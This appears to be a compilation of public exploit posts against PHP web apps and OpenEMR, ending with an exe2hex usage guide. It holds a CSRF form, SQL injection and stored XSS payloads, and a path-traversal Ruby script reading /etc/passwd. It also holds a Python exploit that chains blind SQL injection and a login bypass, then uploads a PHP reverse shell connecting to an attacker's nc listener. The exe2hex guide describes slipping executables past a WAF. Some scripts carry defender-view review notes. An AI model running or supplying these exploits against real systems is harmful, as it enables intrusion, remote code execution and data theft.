name="edited&#95;user&#95;birthday&#95;year" value="" /> <input type="hidden" name="organizations&#91;&#93;" value="1" /> <input type="hidden" name="org&#95;roles&#91;&#93;" value="King&#32;of&#32;Spades" /> <input type="hidden" name="org&#95;priorities&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;1" value="I&#32;am&#32;the&#32;demo&#32;administrator&#32;of&#32;this&#32;site&#46;&#13;&#10;I&#32;love&#32;having&#32;so&#32;much&#32;power&#33;" /> <input type="hidden" name="uf&#95;new&#91;2&#93;&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;new&#91;3&#93;&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;2" value="https&#58;&#47;&#47;twitter&#46;com&#47;b2evolution&#47;" /> <input type="hidden" name="uf&#95;3" value="https&#58;&#47;&#47;www&#46;facebook&#46;com&#47;b2evolution" /> <input type="hidden" name="uf&#95;4" value="https&#58;&#47;&#47;plus&#46;google&#46;com&#47;&#43;b2evolution&#47;posts" /> <input type="hidden" name="uf&#95;5" value="https&#58;&#47;&#47;www&#46;linkedin&#46;com&#47;company&#47;b2evolution&#45;net" /> <input type="hidden" name="uf&#95;6" value="https&#58;&#47;&#47;github&#46;com&#47;b2evolution&#47;b2evolution" /> <input type="hidden" name="uf&#95;7" value="http&#58;&#47;&#47;b2evolution&#46;net&#47;" /> <input type="hidden" name="new&#95;field&#95;type" value="0" /> <input type="hidden" name="actionArray&#91;update&#93;" value="Save&#32;Changes&#33;" /> <input type="hidden" name="crumb&#95;user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" /> <input type="hidden" name="ctrl" value="user" /> <input type="hidden" name="user&#95;tab" value="profile" /> <input type="hidden" name="identity&#95;form" value="1" /> <input type="hidden" name="user&#95;ID" value="1" /> <input type="hidden" name="orig&#95;user&#95;ID" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> Note: the form replays the crumb_user value captured from the author's own session; the request as shown only succeeds against a different victim if that crumb is accepted for the victim's session, so whether this is a genuine CSRF depends on how b2evolution validates crumb_user.
  19. # Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated) # Exploit Author: ircashem # Date 02.07.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /login.php HTTP/1.1 Content-Length: 456 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075 Origin: http://localhost DNT: 1 Referer: http://localhost/ Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Connection: close -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="username" admin -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="password" admin' AND (SELECT 1 from (select sleep(5))a) -- - -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="submit" -----------------------------238993435340593308934076060075-- ########### # Payload # ########### username=admin password=admin' AND (SELECT 1 from (select sleep(5))a) -- -
# Exploit Title: WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS) # Date: July 2, 2021 # Exploit Author: Mohammed Adam # Vendor Homepage: https://wplearnmanager.com/ # Software Link: https://wordpress.org/plugins/learn-manager/ # Version: 1.1.2 # References link: https://wpscan.com/vulnerability/e0182508-23f4-4bdb-a1ef-1d1be38f3ad1 *Description:* The plugin does not properly sanitise or validate its User Field Titles, allowing an XSS payload to be used in them. Furthermore, no CSRF or capability checks were in place, allowing such an attack to be performed either via CSRF or as any user (including unauthenticated). *Proof of Concept:* POST /wp-admin/admin.php?page=jslm_fieldordering&task=saveuserfield HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 207 Connection: close Upgrade-Insecure-Requests: 1 fieldtitle=Image%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&published=1&isvisitorpublished=1&required=0&search_user=1&search_visitor=1&form_request=jslearnmanager&id=28&isuserfield=0&fieldfor=3&save=Save Then visit /wp-admin/admin.php?page=jslm_fieldordering&ff=3 as admin to trigger the XSS. It may also be triggered elsewhere.
# Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)
# Exploit Author: Geiseric
# Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075
# Date 02.07.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04
#
# Review notes (defender view):
# - Stage 1 is a time-based blind SQL injection against the admin login form at
#   /Online_voting_system/admin/: one POST per candidate character, a response slower than one
#   second counts as a hit. Stage 2 logs in with the recovered name and a tautology password.
#   Stage 3 uploads a .php file through save_candidate.php and requests it under admin/upload/.
# - Detection: a burst of admin login POSTs whose server time hovers around one second, a login
#   with a single-quote password, and a new .php file under admin/upload/.
# - Mitigation: parameterised queries on the login path, and refusing non-image files (and PHP
#   execution) in the candidate image upload directory.

import requests
import os
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder
import string
import random

if len(sys.argv) < 4:
    print('[+] Usage: python3 ovsploit.py http://<ip> <your ip> <your port>')
    exit()

url = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]
exp_url = '/Online_voting_system/admin/save_candidate.php'
login_url = '/Online_voting_system/admin/'

def first_get() -> str:
    """Fetch the admin login page and return its raw Set-Cookie header value.

    Raises KeyError if the response sets no cookie.
    NOTE(review): the raw header (including any cookie attributes) is later reused verbatim as a
    Cookie header; this presumably only works when the server sets a single bare cookie — confirm.
    """
    r = requests.get(url+login_url)
    return r.headers['Set-Cookie']

def retrieve_first_admin() -> str:
    """Recover the first admin username character by character via timing.

    For position i, every ASCII code 32..127 is tried; a response slower than one second means
    the injected SLEEP fired for that code. One hundred consecutive misses end the loop.
    Returns the recovered username (may be empty if nothing matched).
    """
    print("[!] Stage 1: Finding a valid admin user through SQL Injection")
    cookie = first_get()
    count = 0
    i=1
    flag = True
    admin = ''
    while flag:
        for j in range(32,128):
            r = requests.post(url+login_url,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie})
            # Timing oracle: a slow reply means character i of the username equals chr(j).
            if (r.elapsed.total_seconds() > 1):
                admin += chr(j)
                i+=1
                sys.stdout.write("\rAdmin User: "+ admin)
                sys.stdout.flush()
                count=0
            else:
                # Give up after 100 misses in a row (network jitter can also end or corrupt this).
                if count == 100:
                    flag = False
                    break
                else:
                    count += 1
    print("\n[+] First admin user found!")
    print("[!] Starting Stage 2")
    return admin

def id_generator(size=6, chars=string.ascii_lowercase) -> str:
    """Return a random lowercase name of `size` letters with a .php suffix (the uploaded artifact name)."""
    return ''.join(random.choice(chars) for _ in range(size))+'.php'

def login_bypass(cookie: str) -> str:
    """Log in as the recovered admin with a tautology password and return the same cookie.

    The login response is not inspected; the caller relies on the server having associated the
    session cookie with an authenticated state.
    """
    username = retrieve_first_admin()
    print("[!] Stage 2 started: Bypassing Login...")
    r = requests.post(url+login_url,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie})
    return cookie

def rev_write() -> str:
    """Write the PHP payload file locally and return its name.

    The file's only content is a system() call that connects back to attacker_ip:attacker_port;
    the same name is reused as the upload filename in exploit().
    """
    name = id_generator()
    f = open(name,'w')
    f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>')
    f.close()
    print('[+] Generated file with reverse shell: ' +name)
    return name

def exploit(cookie: str) -> str:
    """Submit the payload file as the candidate 'image' and return the uploaded filename.

    The upload response is not checked. NOTE(review): the handle from open(filename, 'rb') is
    never closed.
    """
    print("[+] Uploading reverse shell...")
    filename=rev_write()
    multipart_data = MultipartEncoder(
        {
            # a file upload field
            'image': (filename, open(filename, 'rb'), 'application/x-php'),
            # plain text fields
            'user_name': 'admin',
            'rfirstname': 'test',
            'rlastname': 'test',
            'rgender': 'Male',
            'ryear': '1st year',
            'rmname': 'test',
            'rposition': 'Governor',
            'party': 'test',
            'save': 'save'
        }
    )
    r = requests.post(url+exp_url, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie})
    return filename

# Stage ordering: fetch a cookie, authenticate it, upload, then request the file once via curl.
filename = exploit(login_bypass(first_get()))
print("[!] Triggering...")
input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.')
# url and filename are interpolated into a shell command unescaped; the local payload copy is
# removed afterwards, the server-side copy is not.
os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s')
print("[+] Cleaning up!")
os.system("rm "+ filename)
# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)
# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)
# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530
# Date: 2021-06-24
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz
# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml
# Version: < 5.0.2 (it means up to 5.0.1.7)
# Tested on: OpenEMR Version 5.0.1
# References: https://www.exploit-db.com/exploits/50037
# CVE: CVE-2019-14530
# CWE: CWE-22
# Patch: https://github.com/openemr/openemr/pull/2592/files
#
# Review notes (defender view):
# - The script authenticates against interface/main/main_screen.php and then requests
#   custom/ajax_download.php with a fileName parameter made of ../ sequences (CWE-22).
# - Detection: requests to custom/ajax_download.php whose fileName value contains "../".
# - Mitigation: the header lists the upstream patch (PR 2592) and states that 5.0.2 is no
#   longer affected.
# NOTE(review): the shebang below is not on the first line, so it has no effect when the file is
# run directly; 'pathname' is required but not used in the visible code.

#!/usr/bin/env ruby

require 'pathname'
require 'httpx'
require 'docopt'

# Docopt usage text; its layout (Usage:/Options: sections, one pattern per line) is what docopt
# parses, so it is restored here from the collapsed form shown on the page.
doc = <<~DOCOPT
  OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure
  Source: https://github.com/sec-it/exploit-CVE-2019-14530

  Usage:
    #{__FILE__} exploit <url> <filename> <username> <password> [--debug]
    #{__FILE__} -h | --help

  Options:
    <url>       Root URL (base path) including HTTP scheme, port and root folder
    <filename>  Filename of the file to be read
    <username>  Username of the admin
    <password>  Password of the admin
    --debug     Display arguments
    -h, --help  Show this screen

  Examples:
    #{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass
    #{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass
DOCOPT

# Log in through the main screen form and return the response body as a String.
# root_url: base URL; user/pass: admin credentials; http: an HTTPX session (the :cookies plugin
# on the caller's session is what carries the login over to exploit()).
def login(root_url, user, pass, http)
  vuln_url = "#{root_url}/interface/main/main_screen.php?auth=login&site=default"
  params = {
    'new_login_session_management' => '1',
    'authProvider' => 'Default',
    'authUser' => user,
    'clearPass' => pass,
    'languageChoice' => '1'
  }
  http.post(vuln_url, form: params).body.to_s
end

# Request ajax_download.php with a traversal fileName and return the body as a String.
# NOTE(review): the `filename` parameter is not used in this body as shown; the "#(unknown)"
# tail of the URL looks like an extraction artifact of the page rather than the upstream code —
# compare with the linked exploit source before relying on this listing.
def exploit(root_url, filename, http)
  vuln_url = "#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#(unknown)"
  http.get(vuln_url).body.to_s
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  if args['exploit']
    # One session with cookie persistence and redirect following for both requests.
    http = HTTPX.plugin(:cookies).plugin(:follow_redirects)
    login(args['<url>'], args['<username>'], args['<password>'], http)
    puts exploit(args['<url>'], args['<filename>'], http)
  end
rescue Docopt::Exit => e
  # Docopt raises Exit for --help and for usage errors; print its message and end.
  puts e.message
end
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # CVE : N/A # Proof of Concept : 1- Log in with any user account and change the profile picture. 2- Upload any php shell after altering its extension to .jpg or .png (i.e. test.php.jpg). 3- Before uploading your file, intercept your traffic using any proxy. 4- Change the test.php.jpg filename to test.php and click forward. 5- Find your test.php file path and try any command. ###################### REQUEST ########################################## GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost/cman/members/dashboard.php Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc ####################### RESPONSE ######################################### HTTP/1.1 200 OK Date: Sat, 03 Jul 2021 11:28:16 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 X-Powered-By: PHP/8.0.3 Content-Length: 4410 Connection: close Content-Type: text/html; charset=UTF-8 Host Name: MRT OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19043 N/A Build 19043 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: Murat System Boot Time: 6/25/2021, 2:51:40 PM System Manufacturer: Dell Inc. System Type: x64-based PC Processor(s): 1 Processor(s) Installed. ############################################################################
# Exploit Title: Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 03 July 2021 # Exploit Author: Subhadip Nag # Author Linkedin: www.linkedin.com/in/subhadip-nag-09/ # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Online Birth Certificate System 1.1 is vulnerable to stored cross-site scripting (XSS) in the registration form because user-supplied data is not sufficiently sanitised. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/OBCS/obcs/user/register.php 2) In the first name field, enter the payload: <script>alert(1)</script> 3) Click Register 4) Goto: http://localhost/OBCS/obcs/user/login.php 5) Enter your mobile number, password & click login 6) The XSS attack is successful # PoC image 1) https://ibb.co/7C6g6nK
  25. exe2hex is a Python script used to convert Windows PE executable files into batch (or PowerShell) files from which the original executable can be restored. Overview exe2hex encodes the executable binary file into ASCII text format. The result is then transferred to the target computer (echoing an ASCII file is much easier than echoing binary data). When exe2hex's output file is executed, the original program is restored using DEBUG.exe or PowerShell (no third-party program needs to be installed). Files can be transferred to the target computer automatically using the built-in Telnet or WinEXE options in exe2hex. Binary EXE - ASCII Text - *Transfer* - Binary EXE Quick start: -x to read a file or -s to read STDIN (-x /path/to/binary-program.exe, or -s); -b to write a BATch file or -p to write a PoSH file (-b file.bat, or -p powershell.cmd). Usage Example Create a BATch or PowerShell file: Here an arbitrary exe program is used as input: exe2hex -x chaos.exe As you can see, exe2hex converts the exe file into cmd and bat files. Compress file: exe2hex -x chaos.exe -b nc.txt -cc [*] exe2hex v1.5.1 [i] Attempting to clone and compress [i] Creating temporary file /tmp/tmp509bq1bl [+] Compression (strip) was successful! (0.0% saved) upx: /tmp/tmp509bq1bl: NotCompressibleException [+] Compression (UPX) was successful! (0.0% saved) [+] Successfully written (BATch) /root/Desktop/nc.txt Help -h,--help #Show help information and exit -x EXE #EXE binary file to convert -s #Read from STDIN -b BAT #BAT output file (DEBUG.exe method - x86) -p POSH #PoSh output file (PowerShell method - x86/x64) -e #URL-encode the output -r TEXT #pRefix - text added before each line of command -f TEXT #suFfix - text added after each line of command -l INT #Maximum number of hexadecimal values per line -c #Clone and compress the file before conversion (use -cc for higher compression) -t # Create an Expect file to automatically perform Telnet sessions. -w # Create an Expect file to automatically execute WinEXE sessions. 
-v #Enable verbose mode Main features: Converts binary programs to ASCII hexadecimal files that can be restored using a built-in operating system program. Works on older and newer versions of Windows without installing any third-party programs. Supports x86 and x64 operating systems. Either DEBUG.exe or PowerShell can be used to restore the file. Can compress files before conversion. Can URL-encode the output. Option to add prefix and suffix text to each line. Option to set the maximum hexadecimal length of each line. Accepts a binary file or a pipeline on standard input (STDIN). The output can be transmitted automatically via Telnet and/or WinEXE. Telnet login: exe2hex.py -x chaos.exe -b chaos.bat -t This generates a chao-bat-telnet Expect file for the remote connection. Its format is as follows: /klogger-bat-telnet ip username password ./chao-bat-telnet 192.168.123.1 admin admin Welcome to Microsoft Telnet Service login: winxp password: *====================================================================================== Welcome to Microsoft Telnet Server. *====================================================================================== C:\Documents and Settings\winxpcd %TEMP% C:\DOCUME~1\winxp\LOCALS~1\Tempecho 418671.0klogger.bat 418671.0E~1\winxp\LOCALS~1\Temptype klogger.bat C:\DOCUME~1\winxp\LOCALS~1\Temp Postscript: exe2hex writes commonly used programs or scripts into text-based batch files (txt, cmd, bat). Because some hosts' WAF restricts uploading or downloading exe files, exe2hex is presented as a way past that restriction: the executable is transformed into an encoded form, then reconstructed as an exe and executed.
